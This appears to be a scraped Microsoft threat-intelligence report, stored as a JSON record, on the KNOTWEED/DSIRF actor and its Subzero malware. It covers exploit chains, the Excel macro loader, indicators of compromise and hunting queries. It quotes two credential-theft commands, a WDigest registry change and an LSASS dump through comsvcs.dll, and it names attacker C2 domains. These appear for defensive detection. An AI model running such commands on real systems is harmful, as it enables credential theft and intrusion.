Microsoft\u2019s analysis of the observed KNOTWEED activity and related malware used in targeted attacks against our customers. This information is shared with our customers and industry partners to improve detection of these attacks. Customers are encouraged to expedite deployment of the July 2022 Microsoft security updates to protect their systems against exploits using CVE-2022-22047. Microsoft Defender Antivirus and Microsoft Defender for Endpoint have also implemented detections against KNOTWEED\u2019s malware and tools.\n\nPSOAs, which [Microsoft also refers to as cyber mercenaries](<https://blogs.microsoft.com/on-the-issues/2022/07/27/private-sector-cyberweapons-psoas-knotweed/>), sell hacking tools or services through a variety of business models. Two common models for this type of actor are access-as-a-service and hack-for-hire. In access-as-a-service, the actor sells full end-to-end hacking tools that can be used by the purchaser in operations, with the PSOA not involved in any targeting or running of the operation. In hack-for-hire, detailed information is provided by the purchaser to the actor, who then runs the targeted operations. Based on observed attacks and news reports, MSTIC believes that KNOTWEED may blend these models: they sell the Subzero malware to third parties but have also been observed using KNOTWEED-associated infrastructure in some attacks, suggesting more direct involvement.\n\n## Who is KNOTWEED?\n\nKNOTWEED is an Austria-based PSOA named DSIRF. The [DSIRF website](<https://web.archive.org/web/20220713203741/https:/dsirf.eu/about/>) [web archive link] says they provide services_ \u201cto multinational corporations in the technology, retail, energy and financial sectors_\u201d and that they have \u201c_a set of highly sophisticated techniques in gathering and analyzing information._\u201d They publicly offer several services including \u201c_an enhanced due diligence and risk analysis process through providing a deep understanding of individuals and entities\u201d _and _\u201chighly sophisticated Red Teams to challenge your company's most critical assets.\u201d_ \n \nHowever, [multiple](<https://www.intelligenceonline.com/surveillance--interception/2022/04/06/after-finfisher-s-demise-berlin-explores-cyber-tool-options,109766000-art>) [news](<https://www.focus.de/politik/vorab-aus-dem-focus-volle-kontrolle-ueber-zielcomputer-das-raetsel-um-die-spionage-app-fuehrt-ueber-wirecard-zu-putin_id_24442733.html>) [reports](<https://netzpolitik.org/2021/dsirf-wir-enthuellen-den-staatstrojaner-subzero-aus-oesterreich>) have linked DSIRF to the development and attempted sale of a malware toolset called Subzero. MSTIC found the Subzero malware being deployed through a variety of methods, including 0-day exploits in Windows and Adobe Reader, in 2021 and 2022. As part of our investigation into the utility of this malware, Microsoft\u2019s communications with a Subzero victim revealed that they had not commissioned any red teaming or penetration testing, and confirmed that it was unauthorized, malicious activity. Observed victims to date include law firms, banks, and strategic consultancies in countries such as Austria, the United Kingdom, and Panama. It\u2019s important to note that the identification of targets in a country doesn\u2019t necessarily mean that a DSIRF customer resides in the same country, as international targeting is common.\n\nMSTIC has found multiple links between DSIRF and the exploits and malware used in these attacks. These include command-and-control infrastructure used by the malware directly linking to DSIRF, a DSIRF-associated GitHub account being used in one attack, a code signing certificate issued to DSIRF being used to sign an exploit, and other open-source news reports attributing Subzero to DSIRF.\n\n## Observed actor activity\n\n### KNOTWEED initial access\n\nMSTIC found KNOTWEED\u2019s Subzero malware deployed in a variety of ways. In the succeeding sections, the different stages of Subzero are referred to by their Microsoft Defender detection names: _Jumplump _for the persistent loader and _Corelump _for the main malware.\n\n#### KNOTWEED exploits in 2022\n\nIn May 2022, MSTIC found an Adobe Reader remote code execution (RCE) and a 0-day Windows privilege escalation exploit chain being used in an attack that led to the deployment of Subzero. The exploits were packaged into a PDF document that was sent to the victim via email. Microsoft was not able to acquire the PDF or Adobe Reader RCE portion of the exploit chain, but the victim\u2019s Adobe Reader version was released in January 2022, meaning that the exploit used was either a 1-day exploit developed between January and May, or a 0-day exploit. Based on KNOTWEED\u2019s extensive use of other 0-days, we assess with medium confidence that the Adobe Reader RCE is a 0-day exploit. The Windows exploit was analyzed by MSRC, found to be a 0-day exploit, and then patched in July 2022 as CVE-2022-22047. Interestingly, there were indications in the Windows exploit code that it was also designed to be used from Chromium-based browsers, although we\u2019ve seen no evidence of browser-based attacks.\n\nThe CVE-2022-22047 vulnerability is related to an issue with [activation context](<https://docs.microsoft.com/windows/win32/sbscs/activation-contexts>) caching in the Client Server Run-Time Subsystem (CSRSS) on Windows. At a high level, the vulnerability could enable an attacker to provide a crafted assembly manifest, which would create a malicious activation context in the activation context cache, for an arbitrary process. This cached context is used the next time the process spawned.\n\nCVE-2022-22047 was used in KNOTWEED related attacks for privilege escalation. The vulnerability also provided the ability to escape sandboxes (with some caveats, as discussed below) and achieve system-level code execution. The exploit chain starts with writing a malicious DLL to disk from the sandboxed Adobe Reader renderer process. The CVE-2022-22047 exploit was then used to target a system process by providing an application manifest with an undocumented attribute that specified the path of the malicious DLL. Then, when the system process next spawned, the attribute in the malicious activation context was used, the malicious DLL was loaded from the given path, and system-level code execution was achieved.\n\nIt's important to note that exploiting CVE-2022-22047 requires attackers to be able to write a DLL to disk. However, in the threat model of sandboxes, such as that of Adobe Reader and Chromium, the ability to write out files where the attacker _cannot_ control the path isn\u2019t considered dangerous. Hence, these sandboxes aren\u2019t a barrier to the exploitation of CVE-2022-22047.\n\n#### KNOTWEED exploits in 2021\n\nIn 2021, MSRC received a report of two Windows privilege escalation exploits ([CVE-2021-31199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31199>) and [CVE-2021-31201](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31201>)) being used in conjunction with an Adobe Reader exploit ([CVE-2021-28550](<https://helpx.adobe.com/security/products/acrobat/apsb21-29.html>)), all of which were patched in June 2021. MSTIC was able to confirm the use of these in an exploit chain used to deploy Subzero.\n\nWe were later able to link the deployment of Subzero to a fourth exploit, one related to a Windows privilege escalation vulnerability in the Windows Update Medic Service ([CVE-2021-36948](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36948>)), which allowed an attacker to force the service to load an arbitrary signed DLL. The malicious DLL used in the attacks was signed by \u2018DSIRF GmbH\u2019.\n\n![A screenshot of the digital signature details tab from the file properties page. The tab states that the digital signature for the file is OK. The name indicated under the signer information portion is DSIRF GmbH.](https://www.microsoft.com/security/blog/uploads/securityprod/2022/07/Fig1-Valid-digital-signature-from-DSIRF.png)Figure 1. Valid digital signature from DSIRF on Medic Service exploit DLL\n\n#### Malicious Excel documents\n\nIn addition to the exploit chains, another method of access that led to the deployment of Subzero was an Excel file masquerading as a real estate document. The file contained a malicious macro that was obfuscated with large chunks of benign comments from the Kama Sutra, string obfuscation, and use of Excel 4.0 macros.\n\n![](https://www.microsoft.com/security/blog/uploads/securityprod/2022/07/Fig2a-Examples-of-KNOTWEED-macro-obfuscation.png) ![Two screenshots of macro code snippet, presenting different examples of how the macro is obfuscated to evade detection. In the first code snippet, text from the Kama Sutra is inserted among the macro code. The second code snippet presents the code of a function where the attacker uses Excel 4 macro for obfuscation.](https://www.microsoft.com/security/blog/uploads/securityprod/2022/07/Fig2b-Examples-of-KNOTWEED-macro-obfuscation.png)Figure 2: Two examples of KNOTWEED Excel macro obfuscation\n\nAfter de-obfuscating strings at runtime, the VBA macro uses the _ExecuteExcel4Macro_ function to call native Win32 functions to load shellcode into memory allocated using _VirtualAlloc_. Each opcode is individually copied into a newly allocated buffer using _memset_ before _CreateThread_ is called to execute the shellcode.\n\n![A screenshot of a code snippet where the malware copies opcode to a newly allocated buffer.](https://www.microsoft.com/security/blog/uploads/securityprod/2022/07/Fig3-copying-opcodes.png)Figure 3: Copying opcodes ![A screenshot of a code snippet where the malware calls the CreateThread function to execute the shellcode.](https://www.microsoft.com/security/blog/uploads/securityprod/2022/07/Fig4-Calling-CreateThread.png)Figure 4: Calling CreateThread on shellcode\n\nThe following section describes the shellcode executed by the macro.\n\n### KNOTWEED malware and tactics, techniques, and procedures (TTPs)\n\n#### Corelump downloader and loader shellcode\n\nThe downloader shellcode is the initial shellcode executed from either the exploit chains or malicious Excel documents. The shellcode's purpose is to retrieve the _Corelump_ second-stage malware from the actor\u2019s command-and-control (C2) server. The downloader shellcode downloads a JPEG image that contains extra encrypted data appended to the end of the file (past the _0xFF 0xD9_ marker that signifies the end of a JPEG file). The JPEG is then written to the user\u2019s _%TEMP%_ directory.\n\n![](https://www.microsoft.com/security/blog/uploads/securityprod/2022/07/Fig5-Image-embedded-with-the-KNOTWEED-loader-shellcode-and-Corelump.png)Figure 5: One of the images embedded with the loader shellcode and Corelump\n\nThe downloader shellcode searches for a 16-byte marker immediately following the end of JPEG. After finding the marker, the downloader shellcode RC4 decrypts the loader shellcode using the next 16 bytes as the RC4 key. Finally, the loader shellcode RC4 decrypts the _Corelump_ malware using a second RC4 key and manually loads it into memory.\n\n#### Corelump malware\n\n_Corelump _is the main payload and resides exclusively in memory to evade detection. It contains a variety of capabilities including keylogging, capturing screenshots, exfiltrating files, running a remote shell, and running arbitrary plugins downloaded from KNOTWEED\u2019s C2 server.\n\nAs part of installation, _Corelump_ makes copies of legitimate Windows DLLs and overwrites sections of them with malicious code. As part of this process, _Corelump_ also modifies the fields in the PE header to accommodate the nefarious changes, such as adding new exported functions, disabling [Control Flow Guard](<https://docs.microsoft.com/en-us/windows/win32/secbp/control-flow-guard>), and modifying the image file checksum with a computed value from _CheckSumMappedFile._ These trojanized binaries (_Jumplump_) are dropped to disk in _C:\\Windows\\System32\\spool\\drivers\\color\\_, and COM registry keys are modified for persistence (see the Behaviors section for more information on COM hijacking).\n\n#### Jumplump loader\n\n_Jumplump _is responsible for loading _Corelump _into memory from the JPEG file in the %TEMP% directory. If _Corelump_ is not present, _Jumplump_ attempts to download it again from the C2 server. Both_ Jumplump _and the downloader shellcode are heavily obfuscated to make analysis difficult, with most instructions being followed by a jmp to another instruction/jmp combination, giving a convoluted control flow throughout the program.\n\n![A screenshot of assembly code presenting the jmp/instruction obfuscation used in Jumplump malware. ](https://www.microsoft.com/security/blog/uploads/securityprod/2022/07/Fig6-Disassembly-showing-jmp-instructions.png)Figure 6: Disassembly showing the jmp/instruction obfuscation used in Jumplump\n\n#### Mex and PassLib\n\nKNOTWEED was also observed using the bespoke utility tools Mex and PassLib. These tools are developed by KNOTWEED and bear capabilities that are derived from publicly available sources. Mex, for example, is a command-line tool containing several red teaming or security plugins copied from GitHub (listed below):\n\n[Chisel](<https://github.com/jpillora/chisel>)| [mimikatz](<https://github.com/ParrotSec/mimikatz>)| [SharpHound3](<https://github.com/BloodHoundAD/SharpHound3>) \n---|---|--- \n[Curl](<https://github.com/curl/curl>)| [Ping Castle](<https://github.com/vletoux/pingcastle>)| [SharpOxidResolver](<https://github.com/S3cur3Th1sSh1t/SharpOxidResolver>) \n[Grouper2](<https://github.com/l0ss/Grouper2>)| [Rubeus](<https://github.com/GhostPack/Rubeus>)| [PharpPrinter](<https://github.com/rvrsh3ll/SharpPrinter>) \n[Internal Monologue](<https://github.com/eladshamir/Internal-Monologue>)| [SCShell](<https://github.com/Mr-Un1k0d3r/SCShell>)| [SpoolSample](<https://github.com/leechristensen/SpoolSample>) \n[Inveigh](<https://github.com/Kevin-Robertson/Inveigh>)| [Seatbelt](<https://github.com/GhostPack/Seatbelt>)| [StandIn](<https://github.com/FuzzySecurity/StandIn>) \n[Lockless](<https://github.com/GhostPack/Lockless>)| [SharpExec](<https://github.com/anthemtotheego/SharpExec>)| \n \nPassLib is a custom password stealer tool capable of dumping credentials from a variety of sources including web browsers, email clients, LSASS, LSA secrets, and the Windows credential manager.\n\n#### Post-compromise actions\n\nIn victims where KNOTWEED malware had been used, a variety of post-compromise actions were observed:\n\n * Setting of _UseLogonCredential _to \u201c1\u201d to enable plaintext credentials:\n * _reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f_\n * Credential dumping via _comsvcs.dll_:\n * _rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump_\n * Attempt to access emails with dumped credentials from a KNOTWEED IP address\n * Using Curl to download KNOTWEED tooling from public file shares such as _vultrobjects[.]com_\n * Running PowerShell scripts directly from a GitHub gist created by an account associated with DSIRF\n\n### KNOTWEED infrastructure connections to DSIRF\n\nPivoting off a known command-and-control domain identified by MSTIC, _acrobatrelay[.]com_, RiskIQ expanded the view of KNOTWEED's attack infrastructure. Leveraging unique patterns in the use of SSL certificates and other network fingerprints specific to the group and associated with that domain, RiskIQ identified a host of additional IP addresses under the control of KNOTWEED. This infrastructure, largely hosted by Digital Ocean and Choopa, has been actively serving malware since at least February of 2020 and continues through the time of this writing.\n\nRiskIQ next utilized passive DNS data to determine which domains those IPs resolved to at the time they were malicious. This process yielded several domains with direct links to DSIRF, including _demo3[.]dsirf[.]eu_ (the company's own website), and several subdomains that appear to have been used for malware development, including _debugmex[.]dsirflabs[.]eu_ (likely a server used for debugging malware with the bespoke utility tool Mex) and _szstaging[.]dsirflabs[.]eu_ (likely a server used to stage Subzero malware).\n\n## Detection and prevention\n\nMicrosoft will continue to monitor KNOTWEED activity and implement protections for our customers. The current detections and IOCs detailed below are in place and protecting Microsoft customers across our security products. Additional advanced hunting queries are also provided below to help organizations extend their protections and investigations of these attacks.\n\n### Behaviors\n\n_Corelump _drops the_ Jumplump_ loader DLLs to _C:\\Windows\\System32\\spool\\drivers\\color\\\\. _This is a common directory used by malware as well as some legitimate programs, so writes of PE files to the folder should be monitored.\n\n_Jumplump_ uses COM hijacking for persistence, modifying COM registry keys to point to the _Jumplump_ DLL in _C:\\Windows\\System32\\spool\\drivers\\color\\_. Modifications of default system CLSID values should be monitored to detect this technique (e.g., _HKLM\\SOFTWARE\\Classes\\CLSID\\\\{GUID}\\InProcServer32 Default_ value). The five CLSIDs used by _Jumplump_ are listed below with their original clean values on Windows 11:\n\n * {ddc05a5a-351a-4e06-8eaf-54ec1bc2dcea} = "_%SystemRoot%\\System32\\ApplicationFrame.dll_"\n * {1f486a52-3cb1-48fd-8f50-b8dc300d9f9d} = "_%SystemRoot%\\system32\\propsys.dll_"\n * {4590f811-1d3a-11d0-891f-00aa004b2e24} = "_%SystemRoot%\\system32\\wbem\\wbemprox.dll_"\n * {4de225bf-cf59-4cfc-85f7-68b90f185355} = "_%SystemRoot%\\system32\\wbem\\wmiprvsd.dll_"\n * {F56F6FDD-AA9D-4618-A949-C1B91AF43B1A} = "_%SystemRoot%\\System32\\Actioncenter.dll_"\n\nMany of the post-compromise actions can be detected based on their command lines. Customers should monitor for possible malicious activity such as PowerShell executing scripts from internet locations, modification of commonly abused registry keys such as _HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest, _and LSASS credential dumping via minidumps.\n\n## Recommended customer actions\n\nThe techniques used by the actor and described in the Observed actor activity section can be mitigated by adopting the security considerations provided below:\n\n * All customers should prioritize patching of [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>).\n * Confirm that Microsoft Defender Antivirus is updated to security intelligence update **1.371.503.0** or later to detect the related indicators.\n * Use the included indicators of compromise to investigate whether they exist in your environment and assess for potential intrusion.\n * [Change Excel macro security settings](<https://support.microsoft.com/office/change-macro-security-settings-in-excel-a97c09d2-c082-46b8-b19f-e8621e8fe373>) to control which macros run and under what circumstances when you open a workbook. Customers can also [stop malicious XLM or VBA macros](<https://www.microsoft.com/security/blog/2021/03/03/xlm-amsi-new-runtime-defense-against-excel-4-0-macro-malware/>) by ensuring runtime macro scanning by Antimalware Scan Interface ([AMSI](<https://docs.microsoft.com/windows/win32/amsi/antimalware-scan-interface-portal>)) is on. This feature\u2014enabled by default\u2014is on if the Group Policy setting for Macro Run Time Scan Scope is set to \u201cEnable for All Files\u201d or \u201cEnable for Low Trust Files\u201d.\n * Enable multifactor authentication (MFA) to mitigate potentially compromised credentials and ensure that MFA is enforced for all remote connectivity. _Note:_ Microsoft strongly encourages all customers download and use password-less solutions like [Microsoft Authenticator](<https://www.microsoft.com/account/authenticator/>) to secure accounts.\n * Review all authentication activity for remote access infrastructure, with a particular focus on accounts configured with single factor authentication, to confirm authenticity and investigate any anomalous activity.\n\n## Indicators of compromise (IOCs)\n\nThe following list provides IOCs observed during our investigation. We encourage our customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems. All sample hashes are available in VirusTotal.\n\nIndicator| Type| Description \n---|---|--- \n78c255a98003a101fa5ba3f49c50c6922b52ede601edac5db036ab72efc57629| SHA-256| Malicious Excel document and VBA \n0588f61dc7e4b24554cffe4ea56d043d8f6139d2569bc180d4a77cf75b68792f| SHA-256| Malicious Excel document and VBA \n441a3810b9e89bae12eea285a63f92e98181e9fb9efd6c57ef6d265435484964| SHA-256| Jumplump malware \ncbae79f66f724e0fe1705d6b5db3cc8a4e89f6bdf4c37004aa1d45eeab26e84b| SHA-256| Jumplump malware \nfd6515a71530b8329e2c0104d0866c5c6f87546d4b44cc17bbb03e64663b11fc| SHA-256| Jumplump malware \n5d169e083faa73f2920c8593fb95f599dad93d34a6aa2b0f794be978e44c8206| SHA-256| Jumplump malware \n7f29b69eb1af1cc6c1998bad980640bfe779525fd5bb775bc36a0ce3789a8bfc| SHA-256| Jumplump malware \n02a59fe2c94151a08d75a692b550e66a8738eb47f0001234c600b562bf8c227d| SHA-256| Jumplump malware \n7f84bf6a016ca15e654fb5ebc36fd7407cb32c69a0335a32bfc36cb91e36184d| SHA-256| Jumplump malware \nafab2e77dc14831f1719e746042063a8ec107de0e9730249d5681d07f598e5ec| SHA-256| Jumplump malware \n894138dfeee756e366c65a197b4dbef8816406bc32697fac6621601debe17d53| SHA-256| Jumplump malware \n4611340fdade4e36f074f75294194b64dcf2ec0db00f3d958956b4b0d6586431| SHA-256| Jumplump malware \nc96ae21b4cf2e28eec222cfe6ca903c4767a068630a73eca58424f9a975c6b7d| SHA-256| Corelump malware \nfa30be45c5c5a8f679b42ae85410f6099f66fe2b38eb7aa460bcc022babb41ca| SHA-256| Mex tool \ne64bea4032cf2694e85ede1745811e7585d3580821a00ae1b9123bb3d2d442d6| SHA-256| Passlib tool \nacrobatrelay[.]com__| Domain| C2 \nfinconsult[.]cc| Domain| C2 \nrealmetaldns[.]com| Domain| C2 \n \n**NOTE:** These indicators should not be considered exhaustive for this observed activity.\n\n## Detections\n\n### Microsoft Defender Antivirus\n\nMicrosoft Defender Antivirus detects the malware tools and implants used by KNOTWEED starting with signature build **1.371.503.0** as the following family names:\n\n * _Backdoor:O97M/JumplumpDropper_\n * _Trojan:Win32/Jumplump_\n * _Trojan:Win32/Corelump_\n * _HackTool:Win32/Mexlib_\n * _Trojan:Win32/Medcerc_\n * _Behavior:Win32/SuspModuleLoad_\n\n### Microsoft Defender for Endpoint\n\nMicrosoft Defender for Endpoint customers may see the following alerts as an indication of a possible attack. These alerts are not necessarily an indication of KNOTWEED compromise:\n\n * _COM Hijacking _- Detects multiple behaviors, including _JumpLump_ malware persistence techniques.\n * _Possible privilege escalation using CTF module _- Detects a possible privilege escalation behavior associated with CVE-2022-2204; also detects an attempt to perform local privilege escalation by launching an elevated process and loading an untrusted module to perform malicious activities\n * _KNOTWEED actor activity detected _- Detects KNOTWEED actor activities\n * _WDigest configuration change _- Detects potential retrieval of clear text password from changes to _UseLogonCredential_ registry key\n * _Sensitive credential memory read _- Detects LSASS credential dumping via minidumps\n * _Suspicious Curl behavior _- Detects the use of Curl to download KNOTWEED tooling from public file shares\n * _Suspicious screen capture activity_ - Detects _Corelump_ behavior of capturing screenshots of the compromised system\n\n## Hunting queries\n\n### Microsoft Sentinel\n\nThe following resources are available to Microsoft Sentinel customers to identify the activity outlined in the blog post.\n\n**Microsoft Defender Antivirus detections related to KNOTWEED**\n\nThis query identifies occurrences of Microsoft Defender Antivirus detections listed in this blog post:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/KNOTWEEDAVDetection.yaml>\n\n**File hash IOCs related to KNOTWEED**\n\nThis query identifies matches based on file hash IOCs related to KNOTWEED across a range of common Microsoft Sentinel data sets:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/KNOTWEEDFileHashesJuly2022.yaml>\n\n**Domain IOCs related to KNOTWEED**\n\nThis query identifies matches based on domain IOCs related to KNOTWEED across a range of common Microsoft Sentinel data sets:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/KNOTWEEDC2DomainsJuly2022.yaml>\n\n**COM registry key modified to point to Color Profile folder**\n\nThis query identifies modifications to COM registry keys to point to executable files in _C:\\Windows\\System32\\spool\\drivers\\color\\_:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/COMRegistryKeyModifiedtoPointtoFileinColorDrivers.yaml>\n\n**PE file dropped in Color Profile folder**\n\nThis query looks for PE files being created in the _C:\\Windows\\System32\\spool\\drivers\\color\\_ folder:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/DeviceFileEvents/PEfiledroppedinColorDriversFolder.yaml>\n\n**Abnormally large JPEG downloaded from new source**\n\nThis query looks for downloads of JPEG files from remote sources, where the file size is abnormally large, and not from a common source:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/CommonSecurityLog/AbnormallyLargeJPEGFiledDownloadedfromNewSource.yaml>\n\n**Downloading new file using Curl**\n\nThis query looks for new files being downloaded using Curl.\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/MultipleDataSources/DownloadofNewFileUsingCurl.yaml>\n\n**Suspected ****credential dumping**\n\nThis query looks for attackers using comsvcs.dll to dump credentials from memory\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/SecurityEvent/SuspectedLSASSDump.yaml>\n\n**Downgrade to ****plaintext credentials**\n\nThis query looks for registry key being set to enabled plain text credentials\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/WDigestDowngradeAttack.yaml>\n\n### Microsoft 365 Defender advanced hunting\n\nMicrosoft 365 Defender customers can run the following advanced hunting queries to locate IOCs and related malicious activity in their environments.\n\n**Microsoft Defender Antivirus detections related to KNOTWEED**\n\nThis query identifies detection of related malware and tools by Microsoft Defender Antivirus:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-AVDetections.yaml>\n\n**File hash IOCs related to KNOTWEED**\n\nThis query surfaces KNOTWEED file hash IOCs across Microsoft Defender for Endpoint tables:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-FileHashIOCsJuly2022.yaml>\n\n**Domain IOCs related to KNOTWEED**\n\nThis query identifies matches based on domain IOCs related to KNOTWEED against Microsoft Defender for Endpoint device network connections:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-DomainIOCsJuly2022.yaml>\n\n**COM registry key modified to point to Color Profile folder**\n\nThis query identifies modifications to COM registry keys to point to executable files in _C:\\Windows\\System32\\spool\\drivers\\color\\_:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-COMRegistryKeyModifiedtoPointtoColorProfileFolder.yaml>\n\n**PE file dropped in Color Profile folder**\n\nThis query looks for PE files being created in the _C:\\Windows\\System32\\spool\\drivers\\color\\ folder_:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-PEFileDroppedinColorProfileFolder.yaml>\n\n**Downloading new file using Curl**\n\nThis query looks for new files being downloaded using Curl.\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-DownloadingnewfileusingCurl.yaml>\n\nThe post [Untangling KNOTWEED: European private-sector offensive actor using 0-day exploits](<https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-27T14:00:00", "type": "mmpc", "title": "Untangling KNOTWEED: European private-sector offensive actor using 0-day exploits", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-36948", "CVE-2022-2204", "CVE-2022-22047"], "modified": "2022-07-27T14:00:00", "id": "MMPC:85647D37E79AFEF2BFF74B4682648C5E", "href": "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2022-07-27T17:46:22", "description": "The Microsoft Threat Intelligence Center (MSTIC) and the Microsoft Security Response Center (MSRC) found a private-sector offensive actor (PSOA) using multiple Windows and Adobe 0-day exploits, including one for the recently patched [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>), in limited and targeted attacks against European and Central American customers. The PSOA, which MSTIC tracks as KNOTWEED, developed malware called Subzero which was used in these attacks.\n\nThis blog details Microsoft\u2019s analysis of the observed KNOTWEED activity and related malware used in targeted attacks against our customers. This information is shared with our customers and industry partners to improve detection of these attacks. Customers are encouraged to expedite deployment of the July 2022 Microsoft security updates to protect their systems against exploits using CVE-2022-22047. Microsoft Defender Antivirus and Microsoft Defender for Endpoint have also implemented detections against KNOTWEED\u2019s malware and tools.\n\nPSOAs, which [Microsoft also refers to as cyber mercenaries](<https://blogs.microsoft.com/on-the-issues/2022/07/27/private-sector-cyberweapons-psoas-knotweed/>), sell hacking tools or services through a variety of business models. Two common models for this type of actor are access-as-a-service and hack-for-hire. In access-as-a-service, the actor sells full end-to-end hacking tools that can be used by the purchaser in operations, with the PSOA not involved in any targeting or running of the operation. In hack-for-hire, detailed information is provided by the purchaser to the actor, who then runs the targeted operations. Based on observed attacks and news reports, MSTIC believes that KNOTWEED may blend these models: they sell the Subzero malware to third parties but have also been observed using KNOTWEED-associated infrastructure in some attacks, suggesting more direct involvement.\n\n## Who is KNOTWEED?\n\nKNOTWEED is an Austria-based PSOA named DSIRF. The [DSIRF website](<https://web.archive.org/web/20220713203741/https:/dsirf.eu/about/>) [web archive link] says they provide services_ \u201cto multinational corporations in the technology, retail, energy and financial sectors_\u201d and that they have \u201c_a set of highly sophisticated techniques in gathering and analyzing information._\u201d They publicly offer several services including \u201c_an enhanced due diligence and risk analysis process through providing a deep understanding of individuals and entities\u201d _and _\u201chighly sophisticated Red Teams to challenge your company's most critical assets.\u201d_ \n \nHowever, [multiple](<https://www.intelligenceonline.com/surveillance--interception/2022/04/06/after-finfisher-s-demise-berlin-explores-cyber-tool-options,109766000-art>) [news](<https://www.focus.de/politik/vorab-aus-dem-focus-volle-kontrolle-ueber-zielcomputer-das-raetsel-um-die-spionage-app-fuehrt-ueber-wirecard-zu-putin_id_24442733.html>) [reports](<https://netzpolitik.org/2021/dsirf-wir-enthuellen-den-staatstrojaner-subzero-aus-oesterreich>) have linked DSIRF to the development and attempted sale of a malware toolset called Subzero. MSTIC found the Subzero malware being deployed through a variety of methods, including 0-day exploits in Windows and Adobe Reader, in 2021 and 2022. As part of our investigation into the utility of this malware, Microsoft\u2019s communications with a Subzero victim revealed that they had not commissioned any red teaming or penetration testing, and confirmed that it was unauthorized, malicious activity. Observed victims to date include law firms, banks, and strategic consultancies in countries such as Austria, the United Kingdom, and Panama. It\u2019s important to note that the identification of targets in a country doesn\u2019t necessarily mean that a DSIRF customer resides in the same country, as international targeting is common.\n\nMSTIC has found multiple links between DSIRF and the exploits and malware used in these attacks. These include command-and-control infrastructure used by the malware directly linking to DSIRF, a DSIRF-associated GitHub account being used in one attack, a code signing certificate issued to DSIRF being used to sign an exploit, and other open-source news reports attributing Subzero to DSIRF.\n\n## Observed actor activity\n\n### KNOTWEED initial access\n\nMSTIC found KNOTWEED\u2019s Subzero malware deployed in a variety of ways. In the succeeding sections, the different stages of Subzero are referred to by their Microsoft Defender detection names: _Jumplump _for the persistent loader and _Corelump _for the main malware.\n\n#### KNOTWEED exploits in 2022\n\nIn May 2022, MSTIC found an Adobe Reader remote code execution (RCE) and a 0-day Windows privilege escalation exploit chain being used in an attack that led to the deployment of Subzero. The exploits were packaged into a PDF document that was sent to the victim via email. Microsoft was not able to acquire the PDF or Adobe Reader RCE portion of the exploit chain, but the victim\u2019s Adobe Reader version was released in January 2022, meaning that the exploit used was either a 1-day exploit developed between January and May, or a 0-day exploit. Based on KNOTWEED\u2019s extensive use of other 0-days, we assess with medium confidence that the Adobe Reader RCE is a 0-day exploit. The Windows exploit was analyzed by MSRC, found to be a 0-day exploit, and then patched in July 2022 as CVE-2022-22047. Interestingly, there were indications in the Windows exploit code that it was also designed to be used from Chromium-based browsers, although we\u2019ve seen no evidence of browser-based attacks.\n\nThe CVE-2022-22047 vulnerability is related to an issue with [activation 